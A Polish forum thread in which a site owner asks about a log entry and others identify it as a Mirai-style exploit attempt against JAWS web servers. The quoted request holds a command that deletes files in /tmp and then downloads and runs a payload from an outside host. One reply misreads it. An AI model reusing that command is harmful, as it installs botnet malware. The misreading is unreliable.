Co to może zrobić ? |
Co to może zrobić ? |
11.07.2022, 09:16:55
Post
#1
|
|
Grupa: Zarejestrowani Postów: 325 Pomógł: 3 Dołączył: 10.07.2016 Skąd: UK-raine Ostrzeżenie: (0%) |
Hel-lo wszystkim
Jeśli macie a pewnie niektórzy maja z pewnościa .. co to może być ? GET /shell?cd+/tmp;rm+-rf+*;wget+ kreekxassa.ml/jaws;sh+/tmp/jaws" 400 0 "-" "-" wyglada na formę ataku ale moje doświadczenie w temacie "server security" jest stosunkowo niewielkie. Faktem jest, że po tym mój serwer przez kilk aminut był całkowicie martwy .... Macie jakieś wytłumaczenie ? Pozdrówka phpamator Ten post edytował phpamator 11.07.2022, 09:18:54 |
|
|
11.07.2022, 09:52:26
Post
#2
|
|
Grupa: Moderatorzy Postów: 36 519 Pomógł: 6308 Dołączył: 27.12.2004 |
wyglada na to ze twoja strona ma routing o nazwie "shell" ktory pozwala na wykonanie komend na serwerze pobranych z adresu URL. Jesli to prawda to twoja strona jest jak otwarte drzwi do domu dla wlamywacza
-------------------- "Myśl, myśl, myśl..." - Kubuś Puchatek || "Manual, manual, manual..." - Kubuś Programista "Szukaj, szukaj, szukaj..." - Kubuś Odkrywca || "Debuguj, debuguj, debuguj..." - Kubuś Developer |
|
|
11.07.2022, 17:53:49
Post
#3
|
|
Grupa: Zarejestrowani Postów: 621 Pomógł: 144 Dołączył: 22.12.2010 Ostrzeżenie: (0%) |
Próba wykonania komend systemowych przez skrypt 'shell' tak jak nospor wyżej pisał, a dokładniej to atakujący chciał usunac jakies pliki z koncowka *.wget, plik jaws;sh z katalogu kreekxassa.ml i plik jaws w /tmp, sprawdz profilaktycznie czy nie masz jakichs sladow z tymi plikami, jesli masz to masz zainfekowaną stronę i mozliwe ze caly serwer.
|
|
|
15.07.2022, 19:50:37
Post
#4
|
|
Grupa: Zarejestrowani Postów: 323 Pomógł: 52 Dołączył: 18.02.2008 Ostrzeżenie: (0%) |
Podpytałem trochę naszych adminów bo już gdzieś mi się podobny link obił o oczy. To działanie exploitów oparte na kodzie Mirai, który w w Twoim przypadku chce dokonać nieautoryzowanego polecenia powłoki przez serwer Webserwer JAWS. Generalnie ataki tych exploitów (i pochodnych Mirai) zostały stworzone pierwotnie do ataków na IOT (internet rzeczy) w celu zainfekowania ich jak najwięcej ( w sensie np. ruterów czy serwerów sprzętowych) i utworzenia z nich sieci zdalnych botnetów do ataków na dużą skalę.
Pochodne Mirai niestety ciągle ewaluowują i np. któraś wersja Mirai wykorzystuje exploita Spring4Shell do infekowania podatnych serwerów internetowych i rekrutowania ich do ataków DDoS. Jest tego syfu znacznie więcej, tworząc kampanie i zestawy exploitów: Omni, Okai, Hakane itp. Warto o tym poczytać. |
|
|
17.07.2022, 07:06:15
Post
#5
|
|
Grupa: Zarejestrowani Postów: 232 Pomógł: 50 Dołączył: 2.03.2013 Ostrzeżenie: (0%) |
ale tu nie ma co się przejmować zapytanie według tego logu zwrocilo kod 400 czyli błąd...
-------------------- https://studiostawki.com - studio fotograficzne i filmowe - ul. Inflancka 11, Warszawa
|
|
|
17.07.2022, 07:50:37
Post
#6
|
|
Grupa: Zarejestrowani Postów: 323 Pomógł: 52 Dołączył: 18.02.2008 Ostrzeżenie: (0%) |
Jak dostaniesz ileśtam tysięcy takich wywołań w krótkim czasie to położy serwer a mi bardziej chodziło o trochę przydatnych informacji. Tutaj owszem dostał 400 bo jak pisałem to dotyczyło wywołania powłoki shella serwera JAWS.
|
|
|
17.07.2022, 09:16:12
Post
#7
|
|
Grupa: Zarejestrowani Postów: 232 Pomógł: 50 Dołączył: 2.03.2013 Ostrzeżenie: (0%) |
fail2ban?
-------------------- https://studiostawki.com - studio fotograficzne i filmowe - ul. Inflancka 11, Warszawa
|
|
|
17.07.2022, 18:22:58
Post
#8
|
|
Grupa: Zarejestrowani Postów: 323 Pomógł: 52 Dołączył: 18.02.2008 Ostrzeżenie: (0%) |
fail2ban nie chroni przed atakami brutal force rozproszonymi, np.z sieci zdalnych botnetów. W zasadzie chyba każde narzędzie z większym skorelowanym atakiem sobie nie poradzi. To tylko kwestia ilości rządań w czasie.
|
|
|
Wersja Lo-Fi | Aktualny czas: 26.09.2024 - 16:19 |